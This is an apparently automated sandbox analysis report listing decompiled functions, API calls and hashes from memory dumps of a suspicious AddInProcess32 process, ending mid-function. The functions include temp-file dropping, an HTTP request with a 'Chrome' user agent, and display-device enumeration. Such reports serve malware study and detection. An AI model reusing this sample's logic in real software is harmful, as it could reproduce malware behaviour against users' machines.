0x02b52af9
0x02b52b03
0x02b52b0a
0x02b52b23
0x02b52b2b
0x02b52b35
0x02b52b36
0x02b52b3d
0x02b52b44
0x02b52b55
0x02b52b68
0x02b52b77
0x02b52b88
0x02b52b97
0x02b52ba8
0x02b52bbc
0x02b52bc3
0x02b52bca
0x02b52bd1
0x02b52be4
0x02b52bed
0x02b52c0b
0x02b52c10
0x00000000
0x02b52c12
0x02b52c12
0x02b52c24
0x02b52c33
0x02b52c3e
0x00000000
0x02b52c48
0x02b52c5b
0x02b52c61
0x02b52c6f
0x02b52c7d
0x02b52c7d
0x02b52c83
0x02b52c89
0x02b52c33
0x02b52c10
0x02b52c8d
0x02b52c9b

APIs

GetTempPathW.KERNEL32(00000104,?), ref: 02B52AF1
PathAppendW.SHLWAPI(?,?), ref: 02B52B23
StrCatW.SHLWAPI(?,?), ref: 02B52B68
PathFileExistsW.SHLWAPI(?), ref: 02B52B75
CreateDirectoryW.KERNEL32(?,00000000,00000000), ref: 02B52B97
PathFileExistsW.SHLWAPI(?), ref: 02B52BA4
PathAppendW.SHLWAPI(?,?), ref: 02B52BE4
DeleteFileW.KERNEL32(?), ref: 02B52BED
CreateFileW.KERNEL32(?,10000000,00000000,00000000,00000002,00000000,00000000), ref: 02B52C05
WriteFile.KERNEL32(00000000,?,00001C00,?,00000000), ref: 02B52C2B
CloseHandle.KERNEL32(00000000), ref: 02B52C3E
GetLongPathNameW.KERNEL32(?,?,00000104), ref: 02B52C5B
PathFileExistsW.SHLWAPI(?), ref: 02B52C75
CloseHandle.KERNEL32(00000000), ref: 02B52C83

Memory Dump Source

Source File: 00000007.00000002.392656395.0000000002B50000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B50000, based on PE: true

Associated: 00000007.00000002.392656395.0000000002B56000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.392656395.0000000002B5B000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2b50000_AddInProcess32.jbxd

Similarity

API ID: Path$File$Exists$AppendCloseCreateHandle$DeleteDirectoryLongNameTempWrite
String ID:
API String ID: 706663521-0
Opcode ID: 3e4aec782e86c1b90e37532d9cef308f4dacd9b8f14d326197f801334e49dca3
Instruction ID: 0aabc731e3607d2a8cc736d9ac6f73d4216c9389469abae017c0bb598ebd4d65
Opcode Fuzzy Hash: 3e4aec782e86c1b90e37532d9cef308f4dacd9b8f14d326197f801334e49dca3
Instruction Fuzzy Hash: 05514EB190132D9ACB20DF60DC88BDEB77DEF88350F1445E5A909EB141EA309A95CF64

Uniqueness

Uniqueness Score: -1.00%

Function 00401310 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 97
windowCOMMON

Download Yara Rule

C-Code - Quality: 82%

			E00401310(struct HWND__* _a4, intOrPtr _a8, signed short _a12, intOrPtr _a16) {
				signed int _v4;
				short _v524;
				intOrPtr _v528;
				int _v532;
				void* _v536;
				void* _v540;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t15;
				void* _t18;
				struct HBRUSH__* _t29;
				void* _t30;
				void* _t32;
				void* _t34;
				intOrPtr _t42;
				void* _t44;
				void* _t50;
				struct HWND__* _t54;
				void* _t55;
				signed int _t59;

				_t59 =  &_v540;
				_t15 =  *0x413004; // 0x98fc836b
				_v4 = _t15 ^ _t59;
				_t18 = _a8 - 0x110;
				_t42 = _a16;
				_t54 = _a4;
				if(_t18 == 0) {
					_t50 = E00401220();
					_v540 = _t50;
					_v536 =  &_v540;
					_v532 = 0;
					_v528 = E004012C0;
					E00403227( &_v540,  &_v524, L"%s License Agreement", _t42);
					SetWindowTextW(_t54,  &_v524);
					SendMessageW(GetDlgItem(_t54, 0x1f4), 0x435, 0, 0x100000);
					SendMessageW(GetDlgItem(_t54, 0x1f4), 0x449, 2,  &_v536);
					_push(_t50);
					E00403199( &_v524, _t54, __eflags);
					_t59 = _t59 + 0x10;
					goto L13;
				} else {
					_t30 = _t18 - 1;
					if(_t30 == 0) {
						_t32 = (_a12 & 0x0000ffff) - 1;
						__eflags = _t32;
						if(_t32 == 0) {
							EndDialog(_t54, 1);
							goto L13;
						} else {
							_t34 = _t32 - 1;
							__eflags = _t34;
							if(_t34 == 0) {
								EndDialog(_t54, 0);
								goto L13;
							} else {
								__eflags = _t34 - 0x1f3;
								if(__eflags == 0) {
									E00401000(GetDlgItem(_t54, 0x1f4), __eflags);
									L13:
									_t29 = 1;
								} else {
									goto L8;
								}
							}
						}
					} else {
						if(_t30 != 0x27 || _t42 != GetDlgItem(_t54, 0x1f4)) {
							L8:
							_t29 = 0;
						} else {
							_t29 = GetSysColorBrush(5);
						}
					}
				}
				_pop(_t55);
				_pop(_t44);
				E0040318A(_t29, _t44, _v4 ^ _t59, _t55);
				return _t29;
			}

0x00401310
0x00401316
0x0040131d
0x0040132b
0x00401331
0x00401339
0x00401341
0x004013c5
0x004013d5
0x004013d9
0x004013dd
0x004013e5
0x004013ed
0x004013fb
0x00401422
0x00401439
0x0040143b
0x0040143c
0x00401441
0x00000000
0x00401343
0x00401343
0x00401346
0x00401372
0x00401372
0x00401375
0x004013b3
0x00000000
0x00401377
0x00401377
0x00401377
0x0040137a
0x004013a5
0x00000000
0x0040137c
0x0040137c
0x00401381
0x00401398
0x00401445
0x00401445
0x00000000
0x00000000
0x00000000
0x00401381
0x0040137a
0x00401348
0x0040134b
0x00401383
0x00401383
0x0040135d
0x0040135f
0x0040135f
0x0040134b
0x00401346
0x00401452
0x00401453
0x00401456
0x00401461

APIs

GetDlgItem.USER32 ref: 00401353
GetSysColorBrush.USER32(00000005), ref: 0040135F
GetDlgItem.USER32 ref: 00401390
EndDialog.USER32(?,00000000), ref: 004013A5
__swprintf.LIBCMT ref: 004013ED
SetWindowTextW.USER32(?,?), ref: 004013FB
GetDlgItem.USER32 ref: 00401419
SendMessageW.USER32(00000000), ref: 00401422
GetDlgItem.USER32 ref: 00401436
SendMessageW.USER32(00000000), ref: 00401439

Strings

%s License Agreement, xrefs: 004013CF

Memory Dump Source

Source File: 00000007.00000002.392248619.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.392248619.0000000000416000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd

Similarity

API ID: Item$MessageSend$BrushColorDialogTextWindow__swprintf
String ID: %s License Agreement
API String ID: 2951897483-1285993597
Opcode ID: b222d6317158b18de7cdf78b0e5675ac59ac6db589ad6d1fb58f5eea72f61197
Instruction ID: 1530dd87393cf7f224303f11dcabdbff35385f3a88108dc3a53a8d27bff466c6
Opcode Fuzzy Hash: b222d6317158b18de7cdf78b0e5675ac59ac6db589ad6d1fb58f5eea72f61197
Instruction Fuzzy Hash: D031F6715843016BD310AFA89D49FAF76D8AB8C708F10493EF645B62E0DB7CDA05866F

Uniqueness

Uniqueness Score: -1.00%

Function 02B5197B Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 182
networkCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E02B5197B(void* __ebx, WCHAR* __ecx, void* __edi, void* __esi, intOrPtr _a4, intOrPtr* _a8) {
				signed int _v8;
				short _v268;
				short _v524;
				short _v1036;
				char _v1556;
				short _v5724;
				char _v9892;
				void* _v9896;
				WCHAR* _v9900;
				void _v9904;
				intOrPtr _v9908;
				long _v9912;
				long _v9916;
				intOrPtr _v9928;
				WCHAR* _v9932;
				intOrPtr _v9936;
				WCHAR* _v9940;
				intOrPtr _v9944;
				WCHAR* _v9948;
				short _v9952;
				intOrPtr _v9956;
				WCHAR* _v9960;
				intOrPtr _v9964;
				void* _v9976;
				signed int _t60;
				void* _t71;
				void* _t72;
				void* _t79;
				long _t84;
				int _t88;
				intOrPtr _t89;
				void* _t94;
				intOrPtr _t100;
				WCHAR* _t107;
				WCHAR* _t111;
				intOrPtr* _t114;
				void* _t117;
				long _t121;
				signed int _t122;

				E02B53F00();
				_t60 =  *0x2b56004; // 0xbb40e64e
				_v8 = _t60 ^ _t122;
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_t114 = _a8;
				_v9908 = _a4;
				_v9904 = _v9904 & 0;
				_v9900 = __ecx;
				_t117 = 0x3c;
				_v1036 = 0;
				_v524 = 0;
				_v268 = 0;
				_v9892 = 0;
				_v5724 = 0;
				_v1556 = 0;
				_v9916 = 4;
				E02B52CE7(0,  &_v9976, _t117);
				_v9976 = _t117;
				_v9960 =  &_v1036;
				_t20 = _t117 + 0x44; // 0x80
				_t100 = _t20;
				_v9948 =  &_v524;
				_v9944 = _t100;
				_v9940 =  &_v268;
				_v9936 = _t100;
				_v9956 = 0x100;
				_v9932 =  &_v9892;
				_t94 = 0;
				_v9928 = 0x824;
				_v9912 = 0;
				_v9896 = 0;
				if(_t114 != 0) {
					if(InternetCrackUrlW(_v9900, 0, 0,  &_v9976) == 0 || _v9964 != 3 && _v9964 != 4) {
						_t119 = 0;
						goto L19;
					} else {
						_t121 =  ==  ? 0x80803000 : 0x80000000;
						_v9900 = _t121;
						_t79 = InternetOpenW(L"Chrome", 0, 0, 0, 0);
						_v9912 = _t79;
						if(_t79 != 0) {
							_t94 = InternetConnectW(_t79,  &_v1036, _v9952,  &_v524,  &_v268, 3, 0, 0);
							if(_t94 != 0) {
								_t107 =  &_v5724;
								_t111 = _v9932;
								if(_v9928 == 0) {
									_t111 = "/";
								}
								E02B52C9C(_t107, _t111);
								_v9896 = HttpOpenRequestW(_t94, L"HEAD",  &_v5724, L"HTTP/1.1", 0x2b542bc, 0, _t121, 0);
								_t84 = E02B514D8(_t83);
								_t119 = _t84;
								if(_t84 == 0) {
									L19:
									_t71 = _v9896;
									if(_t71 != 0) {
										InternetCloseHandle(_t71);
									}
									if(_t94 != 0) {
										InternetCloseHandle(_t94);
									}
									L23:
									_t72 = _v9912;
									if(_t72 != 0) {
										InternetCloseHandle(_t72);
									}
									L25:
									goto L26;
								} else {
									_t119 = 0;
									_t88 = HttpQueryInfoW(_v9896, 0x20000005,  &_v9904,  &_v9916, 0);
									_t89 = _v9904;
									if(_t88 == 0) {
										L17:
										_t119 = E02B51564(_t94, _t94,  &_v5724, _t114, _t119, _t119, _t119, _t89 - 1, _v9908, 1,  &_v1556, _v9900);
										goto L19;
									}
									if(_t89 > 0x3e800000) {
										goto L19;
									}
									if(_t114 == 0) {
										goto L17;
									}
									 *_t114 = _t89;
									if( *_t114 >= _t89) {
										goto L17;
									}
									_t119 = 3;
									goto L19;
								}
							}
							_t119 = 0;
							goto L23;
						}
						_t119 = 0;
						goto L25;
					}
				} else {
					L26:
					return E02B53C33(_v8 ^ _t122);
				}
			}

0x02b51983
0x02b51988
0x02b5198f
0x02b51995
0x02b51996
0x02b51997
0x02b51998
0x02b5199d
0x02b519a5
0x02b519ab
0x02b519b7
0x02b519b9
0x02b519c0
0x02b519c7
0x02b519ce
0x02b519d5
0x02b519dc
0x02b519e3
0x02b519ed
0x02b519f8
0x02b519fe
0x02b51a0b
0x02b51a0b
0x02b51a0e
0x02b51a1a
0x02b51a20
0x02b51a2b
0x02b51a39
0x02b51a43
0x02b51a49
0x02b51a4b
0x02b51a55
0x02b51a5b
0x02b51a63
0x02b51a83
0x02b51bcd
0x00000000
0x02b51a9f
0x02b51aab
0x02b51ab9
0x02b51abf
0x02b51ac5
0x02b51acd
0x02b51afc
0x02b51b00
0x02b51b10
0x02b51b16
0x02b51b1c
0x02b51b1e
0x02b51b1e
0x02b51b23
0x02b51b4c
0x02b51b52
0x02b51b57
0x02b51b5b
0x02b51bcf
0x02b51bcf
0x02b51bd7
0x02b51bda
0x02b51bda
0x02b51be2
0x02b51be5
0x02b51be5
0x02b51beb
0x02b51beb
0x02b51bf3
0x02b51bf6
0x02b51bf6
0x02b51bfc
0x00000000
0x02b51b5d
0x02b51b5d
0x02b51b7a
0x02b51b82
0x02b51b88
0x02b51ba0
0x02b51bc9
0x00000000
0x02b51bc9
0x02b51b8f
0x00000000
0x00000000
0x02b51b93
0x00000000
0x00000000
0x02b51b97
0x02b51b99
0x00000000
0x00000000
0x02b51b9d
0x00000000
0x02b51b9d
0x02b51b5b
0x02b51b02
0x00000000
0x02b51b02
0x02b51acf
0x00000000
0x02b51acf
0x02b51a65
0x02b51bfe
0x02b51c0e
0x02b51c0e

APIs

InternetCrackUrlW.WININET(?,00000000,00000000,?), ref: 02B51A7B
InternetOpenW.WININET(Chrome,00000000,00000000,00000000,00000000), ref: 02B51ABF

Strings

Chrome, xrefs: 02B51AB4
HEAD, xrefs: 02B51B3E
HTTP/1.1, xrefs: 02B51B32

Memory Dump Source

Source File: 00000007.00000002.392656395.0000000002B50000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B50000, based on PE: true

Associated: 00000007.00000002.392656395.0000000002B56000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.392656395.0000000002B5B000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2b50000_AddInProcess32.jbxd

Similarity

API ID: Internet$CrackOpen
String ID: Chrome$HEAD$HTTP/1.1
API String ID: 1262293563-235090430
Opcode ID: 50d5ac6dbc366125e64432129b8f65557aa5226a81ff2c8b21f5f979119d38df
Instruction ID: 7f87f8814b9e4fb43dd751766a7f575f91f22ce08e8aa2ce59a7a9b6a68a3b16
Opcode Fuzzy Hash: 50d5ac6dbc366125e64432129b8f65557aa5226a81ff2c8b21f5f979119d38df
Instruction Fuzzy Hash: EE610A75D116399FDB25DF689C88BEAB7B8EB14244F0005EAE90DEB200EB715EC48F51

Uniqueness

Uniqueness Score: -1.00%

Function 02B52E5C Relevance: 16.6, APIs: 11, Instructions: 108
stringCOMMON

Download Yara Rule

C-Code - Quality: 55%

			E02B52E5C(void* __ebx, CHAR* __ecx, void* __edi, void* __esi) {
				signed int _v8;
				char _v516;
				struct _DISPLAY_DEVICEA _v940;
				char _v1328;
				char _v1360;
				long _v1364;
				signed int _v1368;
				intOrPtr _v1372;
				signed int _t28;
				char _t60;
				long _t61;
				CHAR* _t78;
				signed int _t80;
				signed int _t82;

				_t82 = (_t80 & 0xfffffff8) - 0x55c;
				_t28 =  *0x2b56004; // 0xbb40e64e
				_v8 = _t28 ^ _t82;
				_push(1);
				_t78 = __ecx;
				_v1364 = 0x1a8;
				_push( &_v1364);
				_push(0);
				_t60 = 0;
				 *((char*)(__ecx)) = 0;
				_push(0);
				while(1) {
					_v1372 = _t60;
					if(EnumDisplayDevicesA(??, ??, ??, ??) == 0) {
						break;
					}
					E02B52CE7(_t31,  &_v940, 0x1a8);
					_v1368 = _v1368 & 0x00000000;
					 *_t82 = "--";
					_v940.cb = 0x1a8;
					_v516 = 0;
					lstrcatA( &_v516, ??);
					lstrcatA( &_v516,  &_v1360);
					lstrcatA( &_v516, "--");
					lstrcatA( &_v516,  &_v1328);
					lstrcatA( &_v516, "--");
					E02B52D16(_t78,  &_v516, 0x1c2);
					if(EnumDisplayDevicesA( &_v1360, 0,  &_v940, 1) != 0) {
						_t61 = _v1368;
						do {
							lstrcatA(_t78,  &(_v940.DeviceName));
							lstrcatA(_t78, "--");
							E02B52D16(_t78,  &(_v940.DeviceString), 0x28a);
							_t61 = _t61 + 1;
						} while (EnumDisplayDevicesA( &_v1360, _t61,  &_v940, 1) != 0);
						_t60 = _v1372;
					}
					GetLastError();
					_push(1);
					_t60 = _t60 + 1;
					_push( &_v1364);
					_push(_t60);
					_push(0);
				}
				return E02B53C33(_v8 ^ _t82);
			}

0x02b52e62
0x02b52e68
0x02b52e6f
0x02b52e83
0x02b52e85
0x02b52e87
0x02b52e91
0x02b52e92
0x02b52e93
0x02b52e95
0x02b52e97
0x02b52fb1
0x02b52fb1
0x02b52fb9
0x00000000
0x00000000
0x02b52ea9
0x02b52eae
0x02b52eba
0x02b52ec2
0x02b52ecd
0x02b52ed5
0x02b52ee8
0x02b52efb
0x02b52f0e
0x02b52f21
0x02b52f35
0x02b52f50
0x02b52f52
0x02b52f56
0x02b52f5f
0x02b52f6b
0x02b52f7f
0x02b52f8e
0x02b52f98
0x02b52f9c
0x02b52f9c
0x02b52fa0
0x02b52fa6
0x02b52fac
0x02b52fad
0x02b52fae
0x02b52faf
0x02b52faf
0x02b52fd3

APIs

lstrcatA.KERNEL32 ref: 02B52ED5
lstrcatA.KERNEL32(?,000001A8), ref: 02B52EE8
lstrcatA.KERNEL32(?,02B5447C), ref: 02B52EFB
lstrcatA.KERNEL32(?,?), ref: 02B52F0E
lstrcatA.KERNEL32(?,02B5447C), ref: 02B52F21
EnumDisplayDevicesA.USER32(?,00000000,?,00000001), ref: 02B52F4C
lstrcatA.KERNEL32(?,?), ref: 02B52F5F
lstrcatA.KERNEL32(?,02B5447C), ref: 02B52F6B
EnumDisplayDevicesA.USER32(?,?,?,00000001), ref: 02B52F96
GetLastError.KERNEL32 ref: 02B52FA0
EnumDisplayDevicesA.USER32(00000000,00000000,?), ref: 02B52FB5

Memory Dump Source

Source File: 00000007.00000002.392656395.0000000002B50000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B50000, based on PE: true

Associated: 00000007.00000002.392656395.0000000002B56000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.392656395.0000000002B5B000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2b50000_AddInProcess32.jbxd

Similarity

API ID: lstrcat$DevicesDisplayEnum$ErrorLast
String ID:
API String ID: 2199724215-0
Opcode ID: 858cd509b39438ccf8fc5cf2dbc50a1a60e33ef9600a9a6507b71edd4afa1c53
Instruction ID: 4e1ba14867f1581a9ed424e66796a8611188b4a442559c3b7252f5ad9017f5ac
Opcode Fuzzy Hash: 858cd509b39438ccf8fc5cf2dbc50a1a60e33ef9600a9a6507b71edd4afa1c53
Instruction Fuzzy Hash: BA416072649355AFE620DF60DC85FEB77ECEF88340F000959F989CB180DB7196498B92

Uniqueness

Uniqueness Score: -1.00%

Function 00401BA0 Relevance: 15.8, APIs: 1, Strings: 8, Instructions: 50
windowCOMMON

Download Yara Rule

C-Code - Quality: 95%

			E00401BA0(void* __eax, void* __esi, void* __eflags, char _a4) {
				void* __ebx;
				struct HWND__* _t9;
				struct HWND__* _t16;
				void* _t17;
				void* _t20;
				void* _t21;

				_t17 = __esi;
				_t12 = __eax;
				_t16 = E004019F0(__eax, L".exe", L"Software\\Classes\\SystemFileAssociations");
				_t21 = _t20 + 4;
				if(_t16 != 0) {
					L5:
					if(_a4 != 0) {
						_push(_t17);
						E00401880(L"Error registering context menu hander", _t16);
						_t21 = _t21 + 4;
					}
					E00401930(0);
					return _t16;
				}
				_t16 = E004019F0(_t12, L"lnkfile", L"Software\\Classes");
				_t21 = _t21 + 4;
				if(_t16 != 0) {
					goto L5;
				}
				_t9 = E004019F0(_t12, L".msc", L"Software\\Classes\\SystemFileAssociations");
				_t16 = _t9;
				_t21 = _t21 + 4;
				if(_t16 != 0) {
					goto L5;
				}
				if(_a4 == _t9) {
					return _t9;
				} else {
					MessageBoxW(_t9, L"ShellRunas context menu handler successfully registered.", L"ShellRunas - Sysinternals: www.sysinternals.com", 0x40);
					return _t16;
				}
			}

0x00401ba0
0x00401ba2
0x00401bb3
0x00401bb5
0x00401bba
0x00401c0a
0x00401c0f
0x00401c11
0x00401c18
0x00401c1d
0x00401c20
0x00401c23
0x00000000
0x00401c2b
0x00401bcb
0x00401bcd
0x00401bd2
0x00000000
0x00000000
0x00401bde
0x00401be3
0x00401be5
0x00401bea
0x00000000
0x00000000
0x00401bf0
0x00401c2f
0x00401bf2
0x00401bff
0x00401c09
0x00401c09

APIs

Part of subcall function 004019F0: RegCreateKeyExW.ADVAPI32(80000001,?,00000000,00000000,00000000,00000004,00000000,?,00000000,?), ref: 00401A2C
Part of subcall function 004019F0: RegCreateKeyExW.ADVAPI32(?,.exe,00000000,00000000,00000000,00000004,00000000,?,00000000), ref: 00401A49
Part of subcall function 004019F0: RegCreateKeyExW.ADVAPI32(?,Shell,00000000,00000000,00000000,00000004,00000000,?,00000000), ref: 00401A76
Part of subcall function 004019F0: RegCreateKeyExW.ADVAPI32(?,Run as different user (netonly)...,00000000,00000000,00000000,00000004,00000000,?,00000000), ref: 00401AA7
Part of subcall function 004019F0: RegCreateKeyExW.ADVAPI32(?,Command,00000000,00000000,00000000,00000006,00000000,?,00000000), ref: 00401AC9
Part of subcall function 004019F0: GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00401AE0

Part of subcall function 004019F0: _swprintf.LIBCMT ref: 00401B1A
Part of subcall function 004019F0: RegSetValueW.ADVAPI32(?,00000000,00000001,?), ref: 00401B54
Part of subcall function 004019F0: RegCloseKey.ADVAPI32(?), ref: 00401B61
Part of subcall function 004019F0: RegCloseKey.ADVAPI32(?), ref: 00401B68
Part of subcall function 004019F0: RegCloseKey.ADVAPI32(?), ref: 00401B6F
Part of subcall function 004019F0: RegCloseKey.ADVAPI32(?), ref: 00401B76
Part of subcall function 004019F0: RegCloseKey.ADVAPI32(?), ref: 00401B7D

MessageBoxW.USER32(00000000,ShellRunas context menu handler successfully registered.,ShellRunas - Sysinternals: www.sysinternals.com,00000040), ref: 00401BFF

Strings

ShellRunas - Sysinternals: www.sysinternals.com, xrefs: 00401BF4
.msc, xrefs: 00401BD9
ShellRunas context menu handler successfully registered., xrefs: 00401BF9
Error registering context menu hander, xrefs: 00401C13
.exe, xrefs: 00401BA9
lnkfile, xrefs: 00401BC1
Software\Classes, xrefs: 00401BBC
Software\Classes\SystemFileAssociations, xrefs: 00401BA4, 00401BD4

Memory Dump Source

Source File: 00000007.00000002.392248619.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.392248619.0000000000416000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd

Similarity

API ID: CloseCreate$FileMessageModuleNameValue_swprintf
String ID: .exe$.msc$Error registering context menu hander$ShellRunas - Sysinternals: www.sysinternals.com$ShellRunas context menu handler successfully registered.$Software\Classes$Software\Classes\SystemFileAssociations$lnkfile
API String ID: 23047349-2855299177
Opcode ID: 0d7b3cff5730ebffb2b1ca40e72fbba3252ccff6b5cd4318ad2bd8684b1371f8
Instruction ID: d48563127560b7a8e7189787d004048206fac3746307ea1a651a0f4517783a92
Opcode Fuzzy Hash: 0d7b3cff5730ebffb2b1ca40e72fbba3252ccff6b5cd4318ad2bd8684b1371f8
Instruction Fuzzy Hash: F8F0A7B5AC430422F3112296290279B114587D17B5F1C407BFE55773F3D97CC885826E

Uniqueness

Uniqueness Score: -1.00%

Function 00401880 Relevance: 15.8, APIs: 5, Strings: 4, Instructions: 47
windowCOMMON

Download Yara Rule

C-Code - Quality: 78%

			E00401880(void* __esi, long _a4) {
				signed int _v4;
				short _v516;
				short _v520;
				signed int _t8;
				long _t10;
				void* _t14;
				void* _t18;
				signed int _t26;
				signed int _t27;

				_t25 = __esi;
				_t26 =  &_v520;
				_t8 =  *0x413004; // 0x98fc836b
				_v4 = _t8 ^ _t26;
				_t10 = _a4;
				if(_t10 == 0) {
					E004032BD( &_v516, 0x100, L"%s.", __esi);
					_t27 = _t26 + 0x10;
				} else {
					FormatMessageW(0x1100, 0, _t10, 0x400,  &_v520, 0, 0);
					_push(_v520);
					E004032BD( &_v516, 0x100, L"%s:\n%s", __esi);
					_t27 = _t26 + 0x14;
				}
				MessageBoxW(0,  &_v516, L"ShellRunas - Sysinternals: www.sysinternals.com", 0x10);
				_t14 = LocalFree(_v520);
				E0040318A(_t14, _t18, _v4 ^ _t27, _t25);
				return _t14;
			}

0x00401880
0x00401880
0x00401886
0x0040188d
0x00401894
0x0040189d
0x004018e9
0x004018ee
0x0040189f
0x004018b5
0x004018be
0x004018cf
0x004018d4
0x004018d4
0x004018ff
0x00401909
0x00401918
0x00401923

APIs

FormatMessageW.KERNEL32(00001100,00000000,?,00000400,00000000,00000000,00000000), ref: 004018B5
_swprintf.LIBCMT ref: 004018CF

Part of subcall function 004032BD: __vswprintf_s_l.LIBCMT ref: 004032D0

_swprintf.LIBCMT ref: 004018E9
MessageBoxW.USER32(00000000,?,ShellRunas - Sysinternals: www.sysinternals.com,00000010), ref: 004018FF
LocalFree.KERNEL32(00000000), ref: 00401909

Strings

%s:%s, xrefs: 004018C0
ShellRunas - Sysinternals: www.sysinternals.com, xrefs: 004018F3
%s., xrefs: 004018DA
Error launching application, xrefs: 004018BF, 004018D9

Memory Dump Source

Source File: 00000007.00000002.392248619.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.392248619.0000000000416000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd

Similarity

API ID: Message_swprintf$FormatFreeLocal__vswprintf_s_l
String ID: %s.$%s:%s$Error launching application$ShellRunas - Sysinternals: www.sysinternals.com
API String ID: 1614748391-2411704194
Opcode ID: 0d8038b8c8fa5fae2156050a63efd2f74c1b151e05b4e0866b50721f8c9af105
Instruction ID: d7ba5e9dad247dd55833599d546a55f01d268ccc4582619336c1b705aef3043d
Opcode Fuzzy Hash: 0d8038b8c8fa5fae2156050a63efd2f74c1b151e05b4e0866b50721f8c9af105
Instruction Fuzzy Hash: 090188B06443007BE220EB50CC4BFEB7BA8AF5CB51F50892DB659A61C1DBF4A544C75E

Uniqueness

Uniqueness Score: -1.00%

Function 02B529B2 Relevance: 15.1, APIs: 10, Instructions: 72
memoryfileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E02B529B2(WCHAR* __ecx, void** __edx, long* _a4) {
				long _v8;
				long _v12;
				void** _v16;
				long _t26;
				void* _t31;
				void* _t33;

				_t26 = 0;
				_v16 = __edx;
				_t33 = CreateFileW(__ecx, 0x80000000, 1, 0, 3, 0, 0);
				_t31 = 0;
				if(_t33 == 0xffffffff) {
					L6:
					 *_a4 = _t26;
					 *_v16 = _t31;
					return 1;
				}
				if(GetFileSize(_t33,  &_v12) != 0) {
					_v8 = _v8 & 0;
					_t26 = GetFileSize(_t33,  &_v12);
					_t31 = HeapAlloc(GetProcessHeap(), 0, _t26);
					ReadFile(_t33, _t31, _t26,  &_v8, 0);
					if(_t26 == _v8) {
						CloseHandle(_t33);
						goto L6;
					}
					HeapFree(GetProcessHeap(), 0, _t31);
				}
				CloseHandle(_t33);
				return 0;
			}

0x02b529bb
0x02b529bd
0x02b529d3
0x02b529d5
0x02b529da
0x02b52a43
0x02b52a49
0x02b52a4e
0x00000000
0x02b52a4e
0x02b529eb
0x02b529f8
0x02b52a02
0x02b52a16
0x02b52a1f
0x02b52a28
0x02b52a3d
0x00000000
0x02b52a3d
0x02b52a34
0x02b52a34
0x02b529ee
0x00000000

APIs

CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,?,00000000,?,02B5140A,?), ref: 02B529CD
GetFileSize.KERNEL32(00000000,?,?,00000000,?,02B5140A,?), ref: 02B529E7
CloseHandle.KERNEL32(00000000,?,00000000,?,02B5140A,?), ref: 02B529EE
GetFileSize.KERNEL32(00000000,?,?,00000000,?,02B5140A,?), ref: 02B52A00
GetProcessHeap.KERNEL32(00000000,00000000,?,00000000,?,02B5140A,?), ref: 02B52A07
HeapAlloc.KERNEL32(00000000,?,00000000,?,02B5140A,?), ref: 02B52A0E
ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,00000000,?,02B5140A,?), ref: 02B52A1F
GetProcessHeap.KERNEL32(00000000,00000000,?,00000000,?,02B5140A,?), ref: 02B52A2D
HeapFree.KERNEL32(00000000,?,00000000,?,02B5140A,?), ref: 02B52A34
CloseHandle.KERNEL32(00000000,?,00000000,?,02B5140A,?), ref: 02B52A3D

Memory Dump Source

Source File: 00000007.00000002.392656395.0000000002B50000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B50000, based on PE: true

Associated: 00000007.00000002.392656395.0000000002B56000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.392656395.0000000002B5B000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2b50000_AddInProcess32.jbxd

Similarity

API ID: FileHeap$CloseHandleProcessSize$AllocCreateFreeRead
String ID:
API String ID: 1490804313-0
Opcode ID: d5ce433b007f0e70924623a9044dbf798d239767d52208c7413169e2b1431b43
Instruction ID: 0d6d54fd8cdc5c9aa6f9066f94e020749082ee833d49854584ed31caf755459e
Opcode Fuzzy Hash: d5ce433b007f0e70924623a9044dbf798d239767d52208c7413169e2b1431b43
Instruction Fuzzy Hash: 3811B172941228BFE7109FA59C88FAF7BBCEF48295F250565FA05DB140D7704E458B70

Uniqueness

Uniqueness Score: -1.00%

Function 00406529 Relevance: 14.0, APIs: 5, Strings: 3, Instructions: 49
libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 83%

			E00406529(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				struct HINSTANCE__* _t21;
				long _t23;
				intOrPtr _t25;
				intOrPtr _t29;
				intOrPtr _t40;
				void* _t41;

				_t33 = __ebx;
				_push(0xc);
				_push(0x411a98);
				E00404A88(__ebx, __edi, __esi);
				_t21 = GetModuleHandleA("KERNEL32.DLL");
				 *(_t41 - 0x1c) = _t21;
				_t40 =  *((intOrPtr*)(_t41 + 8));
				 *((intOrPtr*)(_t40 + 0x5c)) = 0x413990;
